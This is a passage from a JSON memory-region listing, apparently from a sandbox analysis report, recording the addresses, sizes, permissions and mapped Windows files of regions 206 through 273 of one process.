"start_va": 38010880, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 38141952, "type": "region", "version": 1 }, "end_va": 38666239, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x0000000002460000", "norm_filename": null, "region_type": "private_memory", "start_va": 38141952, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 39976960, "type": "region", "version": 1 }, "end_va": 42921983, "entry_point": 39976960, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_207", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 39976960, "timestamp": "00:00:10.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 42926080, "type": "region", "version": 1 }, "end_va": 52559871, "entry_point": 42926080, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_208", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 42926080, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 52559872, "type": "region", "version": 1 }, "end_va": 52625407, "entry_point": 0, "filename": null, "id": "region_209", "name": "private_0x0000000003220000", "norm_filename": null, "region_type": "private_memory", "start_va": 52559872, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 52625408, "type": "region", "version": 1 }, "end_va": 52690943, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x0000000003230000", "norm_filename": null, "region_type": "private_memory", "start_va": 52625408, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 52690944, "type": "region", "version": 1 }, "end_va": 52756479, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x0000000003240000", "norm_filename": null, "region_type": "private_memory", "start_va": 52690944, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 52756480, "type": "region", "version": 1 }, "end_va": 53280767, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x0000000003250000", "norm_filename": null, "region_type": "private_memory", "start_va": 52756480, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 53280768, "type": "region", "version": 1 }, "end_va": 61669375, "entry_point": 0, "filename": null, "id": "region_213", "name": "pagefile_0x00000000032d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 53280768, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 61669376, "type": "region", "version": 1 }, "end_va": 62717951, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x0000000003ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 61669376, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 62717952, "type": "region", "version": 1 }, "end_va": 62783487, "entry_point": 0, "filename": null, "id": "region_215", "name": "private_0x0000000003bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 62717952, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 62783488, "type": "region", "version": 1 }, "end_va": 62849023, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000003be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 62783488, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 62849024, "type": "region", "version": 1 }, "end_va": 62914559, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000003bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 62849024, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 62914560, "type": "region", "version": 1 }, "end_va": 62980095, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000003c00000", "norm_filename": null, "region_type": "private_memory", "start_va": 62914560, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 62980096, "type": "region", "version": 1 }, "end_va": 63045631, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x0000000003c10000", "norm_filename": null, "region_type": "private_memory", "start_va": 62980096, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 63045632, "type": "region", "version": 1 }, "end_va": 63111167, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x0000000003c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 63045632, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 63111168, "type": "region", "version": 1 }, "end_va": 63176703, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x0000000003c30000", "norm_filename": null, "region_type": "private_memory", "start_va": 63111168, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 57344, "start_va": 63176704, "type": "region", "version": 1 }, "end_va": 63234047, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000003c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 63176704, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 63242240, "type": "region", "version": 1 }, "end_va": 63307775, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x0000000003c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 63242240, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 63307776, "type": "region", "version": 1 }, "end_va": 63373311, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x0000000003c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 63307776, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 63373312, "type": "region", "version": 1 }, "end_va": 63438847, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000003c70000", "norm_filename": null, "region_type": "private_memory", "start_va": 63373312, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 63438848, "type": "region", "version": 1 }, "end_va": 63442943, "entry_point": 0, "filename": null, "id": "region_226", "name": "pagefile_0x0000000003c80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 63438848, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 63504384, "type": "region", "version": 1 }, "end_va": 63512575, "entry_point": 0, "filename": null, "id": "region_227", "name": "pagefile_0x0000000003c90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 63504384, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 63569920, "type": "region", "version": 1 }, "end_va": 63635455, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x0000000003ca0000", "norm_filename": null, "region_type": "private_memory", "start_va": 63569920, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 63635456, "type": "region", "version": 1 }, "end_va": 64159743, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x0000000003cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 63635456, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 64159744, "type": "region", "version": 1 }, "end_va": 65208319, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x0000000003d30000", "norm_filename": null, "region_type": "private_memory", "start_va": 64159744, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 65208320, "type": "region", "version": 1 }, "end_va": 69349375, "entry_point": 0, "filename": null, "id": "region_231", "name": "pagefile_0x0000000003e30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65208320, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 69402624, "type": "region", "version": 1 }, "end_va": 69406719, "entry_point": 0, "filename": null, "id": "region_232", "name": "pagefile_0x0000000004230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 69402624, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 69468160, "type": "region", "version": 1 }, "end_va": 69472255, "entry_point": 0, "filename": null, "id": "region_233", "name": "pagefile_0x0000000004240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 69468160, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 69533696, "type": "region", "version": 1 }, "end_va": 69869567, "entry_point": 69533696, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_234", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 69533696, "timestamp": "00:00:10.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 69926912, "type": "region", "version": 1 }, "end_va": 69992447, "entry_point": 0, "filename": null, "id": "region_235", "name": "private_0x00000000042b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 69926912, "timestamp": "00:00:10.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 114688, "start_va": 69992448, "type": "region", "version": 1 }, "end_va": 70107135, "entry_point": 69992448, "filename": "\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db", "id": "region_236", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db", "region_type": "memory_mapped_file", "start_va": 69992448, "timestamp": "00:00:10.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 70123520, "type": "region", "version": 1 }, "end_va": 70127615, "entry_point": 0, "filename": null, "id": "region_237", "name": "pagefile_0x00000000042e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 70123520, "timestamp": "00:00:10.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 70189056, "type": "region", "version": 1 }, "end_va": 71237631, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x00000000042f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 70189056, "timestamp": "00:00:10.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 71237632, "type": "region", "version": 1 }, "end_va": 71241727, "entry_point": 71237632, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_239", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 71237632, "timestamp": "00:00:10.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 71303168, "type": "region", "version": 1 }, "end_va": 71368703, "entry_point": 0, "filename": null, "id": "region_240", "name": "private_0x0000000004400000", "norm_filename": null, "region_type": "private_memory", "start_va": 71303168, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 71368704, "type": "region", "version": 1 }, "end_va": 72417279, "entry_point": 0, "filename": null, "id": "region_241", "name": "private_0x0000000004410000", "norm_filename": null, "region_type": "private_memory", "start_va": 71368704, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 72417280, "type": "region", "version": 1 }, "end_va": 73465855, "entry_point": 0, "filename": null, "id": "region_242", "name": "private_0x0000000004510000", "norm_filename": null, "region_type": "private_memory", "start_va": 72417280, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73465856, "type": "region", "version": 1 }, "end_va": 73531391, "entry_point": 0, "filename": null, "id": "region_243", "name": "private_0x0000000004610000", "norm_filename": null, "region_type": "private_memory", "start_va": 73465856, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73531392, "type": "region", "version": 1 }, "end_va": 73596927, "entry_point": 0, "filename": null, "id": "region_244", "name": "private_0x0000000004620000", "norm_filename": null, "region_type": "private_memory", "start_va": 73531392, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73596928, "type": "region", "version": 1 }, "end_va": 73662463, "entry_point": 0, "filename": null, "id": "region_245", "name": "private_0x0000000004630000", "norm_filename": null, "region_type": "private_memory", "start_va": 73596928, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73662464, "type": "region", "version": 1 }, "end_va": 73727999, "entry_point": 0, "filename": null, "id": "region_246", "name": "private_0x0000000004640000", "norm_filename": null, "region_type": "private_memory", "start_va": 73662464, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73728000, "type": "region", "version": 1 }, "end_va": 73793535, "entry_point": 0, "filename": null, "id": "region_247", "name": "private_0x0000000004650000", "norm_filename": null, "region_type": "private_memory", "start_va": 73728000, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73793536, "type": "region", "version": 1 }, "end_va": 73859071, "entry_point": 0, "filename": null, "id": "region_248", "name": "private_0x0000000004660000", "norm_filename": null, "region_type": "private_memory", "start_va": 73793536, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73859072, "type": "region", "version": 1 }, "end_va": 73924607, "entry_point": 0, "filename": null, "id": "region_249", "name": "private_0x0000000004670000", "norm_filename": null, "region_type": "private_memory", "start_va": 73859072, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73924608, "type": "region", "version": 1 }, "end_va": 73990143, "entry_point": 0, "filename": null, "id": "region_250", "name": "private_0x0000000004680000", "norm_filename": null, "region_type": "private_memory", "start_va": 73924608, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 73990144, "type": "region", "version": 1 }, "end_va": 75038719, "entry_point": 0, "filename": null, "id": "region_251", "name": "private_0x0000000004690000", "norm_filename": null, "region_type": "private_memory", "start_va": 73990144, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 75038720, "type": "region", "version": 1 }, "end_va": 75104255, "entry_point": 0, "filename": null, "id": "region_252", "name": "private_0x0000000004790000", "norm_filename": null, "region_type": "private_memory", "start_va": 75038720, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 75104256, "type": "region", "version": 1 }, "end_va": 75169791, "entry_point": 0, "filename": null, "id": "region_253", "name": "private_0x00000000047a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75104256, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 75169792, "type": "region", "version": 1 }, "end_va": 75235327, "entry_point": 0, "filename": null, "id": "region_254", "name": "private_0x00000000047b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75169792, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 75235328, "type": "region", "version": 1 }, "end_va": 75300863, "entry_point": 0, "filename": null, "id": "region_255", "name": "private_0x00000000047c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75235328, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 75300864, "type": "region", "version": 1 }, "end_va": 75366399, "entry_point": 0, "filename": null, "id": "region_256", "name": "private_0x00000000047d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75300864, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 75366400, "type": "region", "version": 1 }, "end_va": 75431935, "entry_point": 0, "filename": null, "id": "region_257", "name": "private_0x00000000047e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75366400, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 75431936, "type": "region", "version": 1 }, "end_va": 76480511, "entry_point": 0, "filename": null, "id": "region_258", "name": "private_0x00000000047f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75431936, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 76480512, "type": "region", "version": 1 }, "end_va": 76546047, "entry_point": 0, "filename": null, "id": "region_259", "name": "private_0x00000000048f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 76480512, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 76546048, "type": "region", "version": 1 }, "end_va": 76611583, "entry_point": 0, "filename": null, "id": "region_260", "name": "private_0x0000000004900000", "norm_filename": null, "region_type": "private_memory", "start_va": 76546048, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 76611584, "type": "region", "version": 1 }, "end_va": 76677119, "entry_point": 0, "filename": null, "id": "region_261", "name": "private_0x0000000004910000", "norm_filename": null, "region_type": "private_memory", "start_va": 76611584, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 76677120, "type": "region", "version": 1 }, "end_va": 77725695, "entry_point": 0, "filename": null, "id": "region_262", "name": "private_0x0000000004920000", "norm_filename": null, "region_type": "private_memory", "start_va": 76677120, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 77725696, "type": "region", "version": 1 }, "end_va": 77791231, "entry_point": 0, "filename": null, "id": "region_263", "name": "private_0x0000000004a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 77725696, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 77791232, "type": "region", "version": 1 }, "end_va": 77795327, "entry_point": 77791232, "filename": "\\Windows\\System32\\en-US\\msctf.dll.mui", "id": "region_264", "name": "msctf.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\msctf.dll.mui", "region_type": "memory_mapped_file", "start_va": 77791232, "timestamp": "00:00:10.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 77856768, "type": "region", "version": 1 }, "end_va": 77860863, "entry_point": 0, "filename": null, "id": "region_265", "name": "pagefile_0x0000000004a40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 77856768, "timestamp": "00:00:10.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 77922304, "type": "region", "version": 1 }, "end_va": 77987839, "entry_point": 0, "filename": null, "id": "region_266", "name": "private_0x0000000004a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 77922304, "timestamp": "00:00:10.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 139264, "start_va": 77987840, "type": "region", "version": 1 }, "end_va": 78127103, "entry_point": 0, "filename": null, "id": "region_267", "name": "private_0x0000000004a60000", "norm_filename": null, "region_type": "private_memory", "start_va": 77987840, "timestamp": "00:00:10.374", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 78184448, "type": "region", "version": 1 }, "end_va": 78249983, "entry_point": 0, "filename": null, "id": "region_268", "name": "private_0x0000000004a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 78184448, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 78249984, "type": "region", "version": 1 }, "end_va": 78774271, "entry_point": 0, "filename": null, "id": "region_269", "name": "private_0x0000000004aa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 78249984, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 78774272, "type": "region", "version": 1 }, "end_va": 78839807, "entry_point": 0, "filename": null, "id": "region_270", "name": "private_0x0000000004b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 78774272, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 78839808, "type": "region", "version": 1 }, "end_va": 79364095, "entry_point": 0, "filename": null, "id": "region_271", "name": "private_0x0000000004b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 78839808, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 90112, "start_va": 79364096, "type": "region", "version": 1 }, "end_va": 79454207, "entry_point": 0, "filename": null, "id": "region_272", "name": "private_0x0000000004bb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 79364096, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 79495168, "type": "region", "version": 1 }, "end_va": 79560703, "entry_point": 0, "filename": null, "id": "region_273", "name": "private_0x0000000004bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 79495168, "timestamp": "00:00:10.375", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 79560704, "type": "region", 